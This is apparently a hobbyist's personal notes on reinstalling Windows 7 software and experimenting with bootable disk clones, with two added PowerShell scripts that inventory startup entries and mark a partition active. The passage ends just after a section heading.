        A minor, but annoying, problem with KMPlayer that I never had before is that the screen capture width (viewed 'full size' in my favorite viewer, ACDSee ver 7) is not the same as the video on screen. The width of the screen capture is a little wider. (I suspect the capture may be the actual size of the original SD program and the viewing version is narrow, but it is hard to be sure.) Both versions of KMPlayer do this. I am using exactly the same ACDSee program I have always used, no upgrade here. Maybe it's something to do with how I have my monitor screen resolution set up. I have played with all the KMPlayer screen options, of which there are many.

        VLC viewer has the opposite problem. Its screen capture by design seems to be poor. Its screen captures in all three formats (.png, .jpeg, .tiff) are smaller and with clearly less resolution than the video on screen. I need to expand a capture by 140% for it to match the original screen view. After tweaking all the screen capture options of both players I find the KMPlayer capture (even with its width issue) is of much higher quality than VLC, so I would like to get the KMPlayer to work. Maybe try an even older version, which I do see in the archive list.

Re-installing my programs
        As I got into downloading new versions of my programs I found I was picking up a lot of tracking and popup software that piggybacks on downloads (pureLeads and xxxCandy), even though I was careful in selecting sites and always choosing the custom install option. So early on I downloaded my array of proven virus tools (Malwarebytes, etc) and ran them frequently to comb out the crap that is unavoidably picked up when downloading a lot of stuff. I was dreading three tasks, which I knew had been a bitch when I first did them: Canon printer/scanner setup, keyboard script based volume control, and video capture software. The latter I had converted from a browser add on to a stand alone, which worked very well and was a workhorse utility. I also loved my keyboard volume control, but it depended on scripts which I know almost nothing about and didn't even remember the name or file type.

        Vol control from keyboard --- Volume scripts turned out to be based on AutoHotKey. After some work I think I have figured out how this works. Only two files are needed: AutoHotKey.exe and the vol_mute.ahk script file. AutoHotKey seems to be dying (some links are dead, but I found the executable). Here are the tricks:

                            a) AutoHotKey can be put in any directory
                            b) file associate .ahk (script) files with AutoHotKey.exe
                            c) Put vol_mute.ahk script file (few lines of text) in startup directory

Where the hell is the startup directory?
        The startup directory is hard to find. If you put startup (or startup folder) in the Start search box, Windows 7 pretends it doesn't know what you are talking about. That's right, Windows 7 cannot find its own startup folder(s)! This folder is buried about ten layers deep! Yikes, and there are two startup folders (confirmed below):
All Users startup folder should be
            c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Your personal startup folder should be
            c:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
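Rather than browsing ten layers deep, Windows can be asked to resolve both startup folders itself. The script below is an added example (not from the original essay): it lists what is in each startup folder, with shortcut targets resolved, and then lists the Run/RunOnce registry keys, the other usual place a program (or a download piggy-backer) registers itself to start at logon.

```powershell
# Added example, not part of the original essay. Lists everything that auto-starts at
# logon from the two startup folders quoted above and from the Run/RunOnce keys.
# Useful both for dropping in vol_mute.ahk and for checking that nothing unexpected
# survived a malware cleanup. Runs on Windows 7's stock PowerShell 2.0.

$shell = New-Object -ComObject WScript.Shell

# WScript.Shell resolves the special-folder names; these two are the paths quoted above.
$startupFolders = @(
    @{ Label = 'All Users'; Path = $shell.SpecialFolders.Item('AllUsersStartup') },
    @{ Label = 'This user'; Path = $shell.SpecialFolders.Item('Startup') }
)

foreach ($f in $startupFolders) {
    Write-Output ''
    Write-Output ('[{0} startup folder] {1}' -f $f.Label, $f.Path)
    Get-ChildItem -LiteralPath $f.Path -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -ne 'desktop.ini' } |
        ForEach-Object {
            # A .lnk shortcut is only a pointer; its TargetPath is what actually runs.
            $target = ''
            if ($_.Extension -eq '.lnk') { $target = $shell.CreateShortcut($_.FullName).TargetPath }
            '{0,-28} {1,-17} {2}' -f $_.Name, $_.LastWriteTime.ToString('yyyy-MM-dd HH:mm'), $target
        }
}

# Run / RunOnce keys: entries here start at logon too, and this is where tracking and
# popup software picked up with downloads most often parks itself.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    Write-Output ''
    Write-Output "[$key]"
    $values = Get-ItemProperty -Path $key
    foreach ($p in $values.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PowerShell's own PSPath/PSParentPath/... members
        '{0,-28} {1}' -f $p.Name, $p.Value
    }
}
```

Anything listed that you did not install yourself, or whose target path points into a temp or AppData folder you do not recognise, is worth checking with the virus tools mentioned above before the next reboot.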

Vol_mute .ahk (AutoHotKey) script
       This .ahk (AutoHotKey) script works for controlling volume from keyboard. I have it in my All Users startup folder. It emulates a media keyboard. This is the whole script. It is just a Notepad text file with file type changed from .txt to .ahk. It mutes sound using upper right corner Pause/Break key, and Alt PgUp and Alt PgDn keys raise and lower the master volume.
                ; AutoHotKey vol_mute.ahk script
                ; ! <=> Alt

                !PgUp::Send, {Volume_Up}
                return

                !PgDn::Send, {Volume_Down}
                return

                Break::Send, {Volume_Mute}
                return

                ; (new) ScrollLock also mutes/unmutes, see below
                ScrollLock::Send, {Volume_Mute}
                return

        The AutoHotKey volume script above, which I threw together using various references and trial and error, works like before, pretty good, but with some occasional Mute squirreliness. I suspect some of this is Windows bugs in how the media keyboard commands are interpreted. I experimented with increasing the volume steps, like {Volume_Up 2}, and find it unreliable. It will work on some screens and when hotkeys are function keys, but (for some crazy reason) the numbers are ignored when PgUp and PgDn are used! The single volume step used above is 12 steps for half volume, with the volume ramping if the keys are kept depressed. (The script above is a little verbose --- my tests show the comma after Send may not be needed. Some sample scripts don't use 'return', but when I didn't use it the 2nd and 3rd hotkeys did not get picked up.)

        I need to do something to improve the original script, because I find that while the original code above works OK for videos, and generally for the TV tuner, sometimes the TV tuner sound gets muted and no matter what I do I can't get it to unmute. The key I have long used for Mute on/off is the Break key (corner key), and I now suspect this is where the problem lies. It is called 'Break' for a reason. In the early days of computing, when nearly everyone was writing software, it was used to stop code (break out of infinite loops), so my guess is this is some sort of interrupt key, i.e. not a normal keyboard key. The key next to it is ScrollLock, and this key is virtually never used either, so I added the bottom lines above to allow this key to also mute and (more importantly) unmute the sound. Initial tests are encouraging.

        Opera browser --- Knowing that Opera within the last year had radically changed into basically a Chrome clone, losing all the customization that made it so unique, I downloaded the last version of Opera before the gap (12.16). I've got most of my custom buttons back, but I hate the look of it. Turns out that I must have been running Opera 11.5, since beginning with Opera 12.0 (for some inexplicable reason) skins were dropped and replaced by (useless) themes. I either need to live with this or go through the whole customization process again with 11.5, which I can skin to get back where I was. (Yikes, I got and installed Opera 11.5 (11.64 is latest), and when I went to get a skin, I found the Opera (skin) portal was closed about a week earlier (early Mar 2014)! Looks like it's version 12 for a while, and while I love its customized toolbar that allows me to quickly turn javascript on/off (great for getting around some paywalls), with no support from Opera it is becoming increasingly incompatible with some sites. For a while (with Opera 11.5) I haven't been able to send Hotmail email, now with Opera 12 I find that I can't even read my Hotmail email.

        Video capture --- Here I have run into a real roadblock. The program I was using and loved I finally figured out was called Freecorder 4 (for some reason my shortcut was named FCvideo, which did not come up in Google). It ran unobtrusively in the background recording all video (except YouTube). The company (Applian) is still around, but it has withdrawn the free version 4. Can't find it archived anywhere; all download sources link to the vendor. Sampled version 8 and it stinks. Need to look for new video capture software.

        Home network --- I have three computers on my home network (Windows 7 desktop, old XP desktop (wired) and old Vista portable (wireless)), but it came up a kludge and remains a kludge. Windows 7 should be able to set up a home network easily but I found this not to be the case. I wanted to copy over some old programs that I knew from earlier work need not be installed. One in particular was a key program that I use to support my homepage, the html editor, Netscape 4.8 Composer. I knew in the past it had been archived online, but I wanted to just copy it over. It should have been on my backup USB drive, but it wasn't (big mistake), but I found copies on the other two computers.

        For the life of me I could not get Windows 7 to see the XP (maybe something needs to be run on the XP) though it found the Vista portable, and the Vista could see the XP. I found I had only very limited file sharing between the Windows 7 and the Vista portable because of permissions. I would set the Windows 7 c:\ drive to share with everyone having full control, but Vista claimed Windows 7 would not allow files to be saved. Maddening! By trial and error I found the Vista could write files to the Windows 7 c:\Users\Public folder, so this allowed me to copy over Netscape 4.8 to my newly setup Windows 7, where after being moved to a proper home, it ran fine.

        KMPlayer setup --- KMPlayer has long been my standard video player, but it is a nightmare to set up. Its defaults are terrible, for example none of the video controls worked (sharpen, lighten, darken), which is one of the reasons I use this video player. I am pretty familiar with its (seemingly) hundreds of options, but after spending hours playing it still isn't working as well as my old version did. I (finally) got the video controls working by clicking the very last choice: on the 'Configuration Management' page check 'Start KMPlayer with default preset.' What this does I have no idea, but with it checked sharpen and lighten/darken work. Another (core) problem was that with the default settings the sync between audio and video was way off (seconds) and would not sync up. I finally solved (well not really, sync still slips) this one too by noticing that after a sync command, the video began to slip more and more behind the audio. It was like the video processing could not keep up. Clicking off some (???) video processing fixed this problem. A 3rd problem, still unsolved, is that frame captures are mostly blurry; what capture gets is not what shows on the screen. I can't seem to fix this. Very frustrating.

        On the other hand the VLC video player came up 'out of the box' (so to speak) playing video files fine with its default settings.

        Create restore point (script file) --- With my old Windows 7 over the last two years regularly deleting restore points, it was essential that I have an easy way to create restore points (I had made over 250 in two years). This is another script file/shortcut that I had found online and didn't understand, or know anything about, but I found it. It is [CreateRestorePoint.vbs], which is a .vbs script file. It can go anywhere, the desktop shortcut just has to point to it.

        inSSIDer --- This was a very nice, free WiFi strength monitoring program, very useful in hotels, but it's no longer available from its creator as a free utility, so I thought it was gone. There is a new version, but it is not cheap. But I got it back. I found an older, free version, inSSIDer 2.0, on my Vista portable, and when I copied it over, it just worked. Uninstalling the trial version should get rid of an annoying upgrade popup from MetaGeek, its creator.

Upgrade losses
        I had always run Windows 7 with updates off, which might explain why I was so vulnerable to FBI Stop viruses, whose attacks totally stopped months ago for unknown reasons. But with this clean install I decided to let Windows upgrade do its thing, with 100+ 'critical' upgrades listed + SP1 (service pack 1) followed by another 60 critical upgrades. After the first hundred and SP1 no problems, but I just did the latest batch of 60 upgrades and yikes, my desktop is messed up. First I found the toolbar at the top, OK, an easy fix to move it back down to the bottom, but where are my widgets: clock and two local temperature monitors, all three of which I use constantly.

        No widgets --- Not only were my three widgets gone after the latest Windows upgrade, but when I right click the desktop and select widgets nothing happens. What? When I google this I find that in 2012 Microsoft, learning about a security hole in widgets, decided not to fix the hole, but just to shut down widgets. Yup, one of the features of Windows 7 has been (unceremoniously) removed because it was cheaper to just eliminate it than to fix it! Typical Microsoft. They are still selling Windows 7 for $100 no less, but are unwilling to properly maintain it. Another loss, the right side of my desktop is bare, so I need to search for replacement clock and weather quasi-gadgets to replace what I lost.

        Clocx --- This free utility is a pretty good replacement for the clock and calendar (http://www.clocx.net). I am using clock face ane44, which is a basic analog clock, very similar to the gadget clock. This is one of hundreds of clock faces built in! However, because it is a program and not a gadget, Windows key + D causes it to disappear, so when you go to look at the time it's not there.

Useful Windows tools
        'Administrative Tools' --- Typing 'Administrative Tools' in the search box brings up a bunch of useful pages: control boot, shut down services, check out and change partitions on hard drives. You can also get here via Control Panel, System and Security, Administrative Tools. (After deleting all the Acronis services I could find, I find three Acronis services here, one of which is running at boot.)

Disk Cloning
        I have been reading about cloning vs backups. Looks like pros often use cloning. Daily or weekly they image copy their whole hard drive onto a hard drive similar to their inside hard drive. When their drive craps out, they physically remove it and plug in the clone. In 15 minutes they can be up and running. Recovery from the re-install has taken most of a month. Need to learn more.

        -- ** Youtube video says WD advised a guy to attach a new (internal) Sata drive to a USB port via a 'Sata to USB cable' and use clone software to copy the internal hard drive to it. This is interesting because I bought a 1 Tbyte Sata drive and Sata to USB cable a couple of years ago (at my last crash) and never used them. I would need to search out clone software and try this. This could be interesting. Would be fairly easy to make a backup, but would require opening the case to put in the cloned drive.
        -- Bytecc duplicator (Amazon $40). This is a box with two slots for Sata drives. Plug in source and target, push button. Cheap and simple. OK if planning to upgrade or replace a good drive, but not sure how useful. However, one use might be to make a 2nd backup clone from a primary clone.
        -- ESata cable --- Reviews report that a Sata drive connected internally via this cable (3 ft or 6 ft) allows the external drive to work like the c:\ drive with Windows 7. Sata hard drive docking stations cost only $25.
        -- Why did Windows image fail? (Recovery program could not see the USB drive)
        -- The problem with popping in an infrequently cloned whole c: drive, of course, is that all your recent data files need to be found, which could be a huge pain. Cloning probably works much better if files are reorganized. One thought that comes to mind is that all critical data files could be kept off the internal drive, but this only makes sense if the primary USB drive is backed up regularly to the secondary USB drive. The key is probably to have software that regularly backs up all critical data files nightly to an external drive, so if a clone goes in, the old data directories can just be overwritten by the backed up directories.

            I see experts talking about more extensive rearrangement that separates data, programs, and Windows into different partitions. But I suspect in practice this is tricky and it's a lot more techy than I want to get.

        -- Check to see if my bios will allow a boot from a USB drive. (Yes. 'Esc' brings up the boot menu at power up and both my USB drives are listed.) If so, then a Clonezilla disk will make a clone to a USB drive that can be used to boot and recover.
        -- Several users recommend Macrium Reflect 5 Pro (http://www.macrium.com/) for cloning, and they have a free version.

Clone experiments (3/31/14)
        A while back when I had my first Windows crash, I had bought a 1 Tbyte internal SATA drive plus a USB adaptor cable for it, thinking I would try and recover some files. When my computer (mysteriously) came back to life and booted, I let them sit unopened.

My new 1 Tbyte drive is
                Seagate Barracuda 1 TB HDD SATA 6 Gb/s NCQ 64MB Cache 3.5-Inch Internal Bare Drive ST1000DM003
                $58 Amazon, 2,000 reviews (another source of info). One reviewer cloned his primary drive to this one (1 hr), just moved the Sata cable, and the machine booted from this new drive.

http://www.amazon.com/Seagate-Barracuda-3-5-Inch-Internal-ST1000DM003/dp/B005T3GRNW/ref=pd_rhf_se_s_cp_46_JTVF?ie=UTF8&refRID=0PZX1W3QE0TF9RRTC443

Internal 1Tbyte Seagate sata drive connected via USB converter
        Well, today I opened up the hard drive and USB converter boxes. After puzzling for a few minutes, I figured out how to connect the cables (unlike any of the figures on the box!) and got it working. Opening Windows Disk configuration it was visible, shown 'uninitialized', but was not visible in Explorer. In Disk configuration, after a web search, I selected Master Boot Record (MBR?), which is what you want for drives 2 Tbyte or less, and then formatted it and assigned a letter (F:\), and that did it. It now showed up in Explorer with the correct size, and I copied over a file to verify it was working.

        "I have spent many (many!) hours studying backup strategies, and of course there are many depending on one's needs. The most elusive of all however (detailed by hundreds of posts from myself and others on these forums) has always been the simplest of all - the Bootable HDD Clone Disk (BCD henceforth)." (forum posting) This guy went on to say he wanted to boot without using ANY recovery media or environment. Amen! And that he couldn't find any software that said they do this.

        What I want is multiple bootable drives I can select from the bios order. See zero info on this!!

Casper 8  (http://www.fssdev.com/)
        "Instantly-Bootable Backups: For rapid recovery, Casper maintains a complete, immediately-bootable backup replacement for a Windows system drive. In the event of hard disk failure or disk corruption, a Casper bootable backup can be used immediately as either a temporary or permanent replacement for the original hard disk." (Casper 8 description)

        Look into this. It is $50, but they have a 30 day free trial! (Downloaded it and used it to clone (copy) my internal drive.)

(update)
        I have now tried several (free) clone packages and the one I like the best so far is Casper 8. I think I may buy it. One nice feature it has that others don't have is that after it first writes a clone, it can 'differentially' update it, meaning it scans both drives and only writes the sectors that have changed. This differential backup takes about an hour and can run in the background while the computer is being used. The latter is possible because clone software uses some sort of volume sampler that Microsoft has built into Windows 7. Some posters are skeptical that you can reliably clone from within working Windows, but this is probably a solved problem. No article on cloning mentions this as an issue.

Bootable HDD Clone Disk
        From my online reading I find there are a bewildering number of ways to use two hard drives, but it seems to me the guy above has got it right. To avoid the nightmare of reinstalling all my programs (a month's work!) what I think I want is for the second drive to be a clone of the first. It needs to be bootable, and in case of a problem with my primary drive can't I just, at power up (using Esc), change the boot sequence and boot up on the clone?

Not Raid 1
        I think my computer supports Raid and at first this seemed like the way to go. Choosing 'Raid 1' automatically has the 2nd drive mirror the first. OK, this protects from a sudden physical failure of the primary drive, but it would not have protected me from the problem I just had where over a week or two Windows got unstable and I began to have blue screen crashes. Seems to me in a mirror configuration I will just have unstable Windows (c:\ and probably d:\) on both drives.
        What makes sense to me now would be to make periodic clones of the primary disk to the clone disk, but only when Windows is healthy on the primary.

Clone primary drive on internal via USB
        First test is to clone my primary (system, c:\ and d:\ partitions) to the 1 Tbyte internal now running via USB. I am going to try (free) Macrium Reflect for this. (Took a look at Seagate disk clone and didn't like it.) Whether or how to make it bootable will require some research and trial and error. I'm thinking after the clone I will just try and see if it boots from it. I can already see the new 1 Tbyte drive in the boot sequence, where it is now 6th and last.

        I probably should make an image file too on 2 Tbyte drive #2, which has lots of room.

Test of Casper 8 clone (copy) (3/31/14)
        I downloaded a 30 day trial version of Casper 8 and used it to 'copy' overnight the entire contents of the internal 700 Gbyte drive to my 1 Tbyte internal drive hooked up to a USB port (via an adaptor). It reports the copying took 2 hr, 20 min (100 Gbytes used) and the copy looks perfect. I made a minor change and did a recopy. Casper says they use Smart Technology and only recopy what has changed; nevertheless the incremental update copy took 1 hr, 10 min, half the time of the full copy. (It spends a lot of time comparing the disks first.) However, amazingly the smart re-copy works in the background while Windows is being used. How it does this I don't know.

        I specified during the Copy that the extra drive space on the new drive (250 Gbyte nominal) not be used (not the recommended option, which is to spread the copy over the new larger disk). Seems to me this is important if I need to copy the clone back to the original drive. However, Casper does claim that they can copy a larger disk back to a smaller one. I like the clone (Casper calls it 'Copy'). I think this is the way to go for backups. It needs another drive, a dedicated drive, but so what.

Is the clone bootable?
        Now the 64 dollar question: is the clone bootable? Surprisingly this is very hard to tell. I can select the clone USB from the boot menu, and the boot goes OK, but I don't really know if it is booting from the USB drive or not! Searching online did not reveal any clear cut way to tell. I tried with a paper tube to listen to the disk head, but this test was inconclusive; I heard head noise with both boot options. I can think of one way to tell, but I haven't tried it yet because I am worried things will get screwed up. The test is to pull out the USB during the boot process; probably pulling it quickly would be the safest.

        Damn, there's a very good chance I am not booting off the clone. I pulled the clone and plugged in 2 Tbyte #2, which is clearly not a bootable drive. I selected the 2 Tbyte drive at power up and Windows booted normally, so this test shows Windows will clearly boot from its internal drive if a non-bootable drive is selected from the boot sequence.

        For the clone to be bootable it needs a 'bootable master boot record' or 'active partition'. Below is the option Casper says to use to make the clone bootable: 'Copy an entire hard disk'. This is not 100% clear. I chose copy and the three partitions of the internal drive were check marked by default, so is this copy the entire hard disk?

After copying my Windows system drive to a new drive, I cannot boot from the copy. Why not?  (Casper Q&A)
        The most common reason for this problem is the absence of a 'bootable master boot record' or 'active partition' on the target disk. When using the 'Copy a specific drive' method to copy one drive to another, Casper does not replace the master boot record or change the active partition status on the target disk.

        In order to ensure the target disk contains a valid master boot record and the appropriate partition is marked active, it is necessary to use the 'Copy an entire hard disk' method. Alternatively, Casper Explorer may be used to apply a genuine Windows master boot record and change the active partition status on the target disk. (?? don't see this)

        For additional information related to resolving boot problems, see the help topic entitled 'Resolving Boot Problems' under the 'Troubleshooting' section in the Casper help file. For help with replacing a master boot record or changing the active partition on a hard disk, see the help topics 'Repair' or 'replace a master boot record and Mark a partition active' under the Disk Management section of Working with Casper Explorer in the Casper help file.

        I do read in forums that posters with two bootable drives (usually with two different versions of Windows) say they can switch between them by changing the boot order in the bios. However, I suspect there is another bios entry (F10). The one I get with Esc only has a list of drives, nothing else.

F10 accesses the main bios screens (Esc selects boot order)
            My 1 Tbyte shows up in the CDRom group (as #2 in the group), which has priority, so from this I would think it would boot. Tried to make it #1 in the CDRom group, but can't. But I can see from Disk Configuration that all booting looks like it is being done from the internal drive. The two Seagate drives are easily told apart by looking at the total size. The boot partition is marked and in every case it's on the internal drive. I need to check if my USB 1 Tbyte drive is bootable, because if it is I would think I would have booted from it by now.

            The bios also shows my machine has Sata on the motherboard, which means the new drive can probably plug in.

Bootable clone drive?
        I now suspect that when I select it at boot I am (or might be) in fact booting from the clone 1 Tbyte drive. When I boot with the inside drive selected and pull the USB plug at boot (did it twice), nothing happens; the machine boots normally. But when I select boot from the USB 1 Tbyte clone and pull the USB plug (when the Windows spiralling four colors appear), the boot freezes! Of course, the real definitive test is opening the case and disconnecting the 700 Gbyte internal Seagate drive. But it leaves open the question: if Windows goes bad must I open the case and remove it? An interesting test might be to disable some Windows file (how?) on the internal drive and see if Windows runs OK from the clone.

** Need to open case to disable drive with 'bad windows'
        Unfortunately even if the clone boot loader is working I can see that the Windows running is from the internal drive. Two ways I see this. One, I ran a simple test to screw up Windows by shutting off desktop icons ('Right click on desktop - View - uncheck show desktop icons'). When I turn icons off and simply reboot, they stay off. Unfortunately when I select the USB 1 Tbyte to boot from they stay off too! Two, I downloaded a new utility (EasyBCD) since I made (and updated) the clone; there it is in the c:\ drive, but it is missing in the clone F:\ drive. So my expectation is that if I unplug the internal drive Sata cable and I really am booting from the clone, which will be obvious, what I now see as F:\ (with no EasyBCD) will become the c:\ drive.

        Macrium help files explained that there can't be two c:\ drives in Windows, implying that the clone files will show up initially as a higher letter (F:\ in my case), but that when the internal drive is removed (unplug the Sata cable) the drive letters will 'settle down' with the clone probably showing up as c:\, and if it doesn't, c:\ could be assigned on the Windows disk configuration page. I ran a test adding an image to the c:\ drive on the clone, and even after booting from it the image shows up on the F:\ drive. Does this imply that Windows is running off the internal Windows files and that it is required to pull the internal Sata cable? Not sure. This needs to be tested; I need a bad Windows!

Boot sequence --- F10 'Setup' and Esc 'Boot Menu'
        To boot from a USB drive it must be set higher in the boot sequence priority than the internal drive. There are two boot sequence menus built into the bios of my HP computer, and the hot keys flash (so fast as to be barely readable) on screen at power up: F10 'Setup' and Esc 'Boot Menu'. I was originally confused by this because it seemed like both allowed the boot sequence to be set, but the order was different! I found an article that explained what is going on.

        F10 (Setup) is the full bios set of screens like Windows computers have had for years. These bios settings are stored in CMOS, so using these bios screens to make a temporary change in boot sequence means changing it and then later changing it back. To make repairs easier newer bioses have another hotkey that offers a one time (in ram) way to change the boot sequence, which in my HP is called 'Boot Menu' and is brought up with the (corner) Esc key. This must mean the Boot (Esc) sequence is an override of the CMOS boot sequence. Still it is a little confusing. I find the Boot (Esc) list always seems to show the internal hard drive first, but in the CMOS sequence the disk drive group, which includes the internal drive, comes after the CD/DVD options. Maybe this is affected by having no bootable CD/DVD in the drive.

        My supposedly bootable clone 1 Tbyte, when connected up (and powered) prior to boot, does show up in both lists. So the way to set it as the boot drive is (very likely) to select it using the Boot (Esc) sequence. Earlier when I did this and pulled the USB plug during boot, the boot froze, so I may have been booting from the USB drive. Nevertheless, I haven't yet been able to get the settings of Windows on the USB drive to show up at boot.

        Bios settings (F10) show the boot sequences. Boot sources are in groups and the groups are sequenced too. The first group is the CD/DVD drive, and in this group I find the 1 Tbyte USB drive. Next comes the hard drive group. There were three drives here, the internal Seagate 700 Gbyte and the two 2 Tbyte USB drives. I found the internal Seagate drive was not #1 in this group. It was listed after one of the USB drives. This might be an important reason why with USB stuff connected boot is 2-3 min vs 1 min. I moved the internal drive to the #1 position in the drive group.

Disk structure
        From Wikipedia (System partition and boot partition). Microsoft defines these terms essentially reversed compared to all other operating systems. Microsoft defines the terms as follows:

        * The system partition is a primary (hidden) partition that contains the boot loader, a piece of software responsible for booting the OS. This partition holds the boot sector and is marked active. [This is only 30 Mbytes used on a 100 Mbyte partition with no letter. It has the boot loader and boot sector (probably MBR -- master boot record)]

        * The boot partition is the disk partition that contains the operating system folder, known as system root [This is the c:\ partition and contains the OS files as well as programs and data.]

        Starting with Windows 7, Windows Setup creates a separate System partition that is not given an identifier and therefore is hidden. The boot partition is still given "C:" as its identifier. Note the d:\ recovery partition, which has the backup copy of the OS, is 10 Gbyte in size, so obviously the running OS has to be on the c:\ partition, because the (hidden) System partition is only 100 Mbytes and 70% of that is free.

Active partitions (4/3/14)
        I saw one quick reference in an article that you needed to go into disk configuration and mark a partition 'active' for a drive to boot. Then on a Microsoft site I found this:

Mark a partition as active
        Marking a partition as active is an advanced task that should only be performed by advanced users (and only by administrator). Marking a partition as active on a basic disk means that the computer will use the loader on that partition to start the operating system. There can be only one active partition per physical hard disk. You can't make a logical drive (i.e a partition assigned a letter like c:\ or f:\) or an extended partition active. Only a primary partition can be made active. [100 Mbyte System partition with no letter has the boot loader and boot sector. For this physical hard drive to boot its System partition needs to be marked 'active' to allow its loader to load.]

        ** If you have multiple hard disks installed on your computer, it's possible for each (physical) hard disk to have a System partition set as active. The active partition on the first hard disk that your computer's BIOS detects is the one that will start the computer.

        Below is the Disk Management screen showing the partitions of the four hard drives connected to my computer. Disk 0 is the internal 700 Gbyte drive. Disk 1 is the 1 Tbyte USB drive (sata drive via USB converter) that is a clone of Disk 0 (using Casper 8), so its partitions mirror Disk 0 as a result of the cloning. I have manually set the System partition of the clone (Disk 1) to 'active' (so it can boot). Disk 2 and Disk 3 are 2 Tbyte USB data backup drives with a single partition. (It is still unclear if I am able to boot from my clone Disk 1 USB drive or not.)

Windows 7 with four physical hard drives, internal plus three USB hard drives
Disk 0 --- Internal 700 Gbyte (sata) drive
Disk 1 --- 1 Tbyte sata 'clone' drive connected via USB (bootable status unclear)
Disk 2 and Disk 3 --- 2 Tbyte USB drives used for data backup
        OK, this could be progress. Using disk configuration I see that it is the System partition (100 Mbyte) of the internal drive that is marked 'active'. The internal c:\ drive is marked 'boot, page file, crash dump, primary partition', but it is not marked 'active'. The 'System' partition of the clone has been up to now not active, but now it is. Just had to right click it and select make active. This all fits with the Microsoft documentation above. Now if I change the boot sequence I may be able to boot from the clone (with the internal Seagate still connected). To separate the original c:\ and its f:\ clone, I have added a 2nd (copy) image file to the c:\ internal drive. If that directory with the double image ends up as f:\ then I will have booted from the USB clone and its version of c:\ will be c:\.
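
        As an added example (not from this page, and not from Casper's or Microsoft's documentation), here is a PowerShell script for Windows 7 that does what the Disk Management screen above shows, but in a form you can run before and after the 'mark active' step: it lists every partition on every physical disk with its size, drive letter and the active flag (from the Win32_DiskPartition WMI class), and it wraps the same 'Mark Partition as Active' operation in a diskpart script. The disk and partition numbers used at the bottom (disk 1, diskpart partition 1 for the clone's 100 Mbyte System partition) are assumptions to be checked against the listing first. The one safety check is mine: the script refuses to change the active partition on the disk the running OS was loaded from, because that is the disk where a wrong choice leaves you unbootable.

```powershell
# Added example (not from the page): inventory every partition on every
# physical disk with its 'active' flag, then (optionally) mark the clone's
# System partition active via a diskpart script. PowerShell 2.0 / Windows 7
# idioms (Get-WmiObject, no [PSCustomObject]). Run from an elevated prompt.

function Get-PartitionFlags {
    # One row per partition. Win32_DiskPartition.Index counts from 0, while
    # diskpart's 'list partition' counts from 1, hence the DiskpartNum column.
    Get-WmiObject Win32_DiskPartition | Sort-Object DiskIndex, Index | ForEach-Object {
        $p = $_
        # Drive letter of the volume on this partition (blank for the hidden System partition)
        $letters = Get-WmiObject -Query ("ASSOCIATORS OF {Win32_DiskPartition.DeviceID='" +
            $p.DeviceID + "'} WHERE AssocClass=Win32_LogicalDiskToPartition") |
            ForEach-Object { $_.DeviceID }
        New-Object PSObject -Property @{
            Disk        = $p.DiskIndex
            Partition   = $p.Index
            DiskpartNum = $p.Index + 1
            Letter      = (@($letters) -join ',')
            SizeGB      = [math]::Round($p.Size / 1GB, 1)
            Primary     = $p.PrimaryPartition
            Active      = $p.BootPartition   # 'active partition' per the Win32_DiskPartition docs
            Bootable    = $p.Bootable
        }
    } | Select-Object Disk, Partition, DiskpartNum, Letter, SizeGB, Primary, Active, Bootable
}

function Get-OsDiskIndex {
    # Index of the physical disk holding the running OS's SystemDrive (C: here)
    $sysDrive = (Get-WmiObject Win32_OperatingSystem).SystemDrive
    $part = Get-WmiObject -Query ("ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='" +
        $sysDrive + "'} WHERE AssocClass=Win32_LogicalDiskToPartition")
    return [int]$part.DiskIndex
}

function Set-PartitionActive {
    param([int]$DiskNumber, [int]$DiskpartPartitionNumber)
    # Same operation as Disk Management's 'Mark Partition as Active', driven
    # by 'diskpart /s'. Only one partition per disk can be active, and getting
    # it wrong on the disk the running OS lives on is how a machine ends up
    # unbootable, so that disk is refused outright.
    if ($DiskNumber -eq (Get-OsDiskIndex)) {
        throw "Disk $DiskNumber hosts the running OS; refusing to change its active partition."
    }
    $scriptPath = Join-Path $env:TEMP 'mark-active.txt'
    @("select disk $DiskNumber",
      "select partition $DiskpartPartitionNumber",
      "active",
      "list partition") | Set-Content -Path $scriptPath -Encoding ASCII
    diskpart /s $scriptPath
    Remove-Item $scriptPath
}

# Usage: inventory first and confirm the numbers, then mark the clone's 100 MB
# System partition. Disk 1 / diskpart partition 1 are assumptions; verify them.
Get-PartitionFlags | Format-Table -AutoSize
# Set-PartitionActive -DiskNumber 1 -DiskpartPartitionNumber 1
```

        Run the listing on its own first: on a layout like the one described above you should see the 100 Mbyte partition of disk 0 with Active true and no letter, c:\ with Active false, and the clone's matching partition on disk 1 going from false to true after the Disk Management step (or after uncommenting the last line).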

EasyBCD
        Guys with two operating systems installed need an easier way to choose between them at boot, so for them there are utilities that pop up a system selector (with timeout) during boot. I downloaded a popular free one mentioned on forums: the EasyBCD utility (NeoSmart Technologies). Took a while to figure out, but now it asks if I want to boot from the F:\ drive with a 10 sec timer that defaults to the internal drive. Based on my tests it looks like this utility probably overrides the Boot Menu choice, since it comes up afterward. This utility says it looks for the same boot loader file on (external) F:\ that it looks for on c:\. I have verified the file is there on F:\, but when I select it, I immediately get a message it can't boot from there. Don't understand what is going on.

        OK, I think I figured this out. I have bypassed this hurdle and MsConfig is telling me I have booted from the USB clone drive. While the clone software (here Casper 8) has put the boot loader onto the USB clone drive's 100 Mbyte System partition, it's not yet ready to boot. A check of the clone partitions with Disk Configuration shows its System partition is not marked 'active', as the disk 0 internal drive's is. To (in effect) activate the clone drive to make it bootable, you need to mark the clone's System partition as active. This is done using the Disk Configuration screen and right clicking the disk 1 clone System partition. After I did this, the 'can't boot from there' halt went away.

        When I looked at the boot screens of 'msconfig', I think I can see how EasyBCD works. It appears to be a utility to modify the boot settings of msconfig.exe. The boot options and names I entered into EasyBCD I now see reflected in the boot options of msconfig, which was a surprise!

How I added Entry #2 for the clone to the EasyBCD boot menu

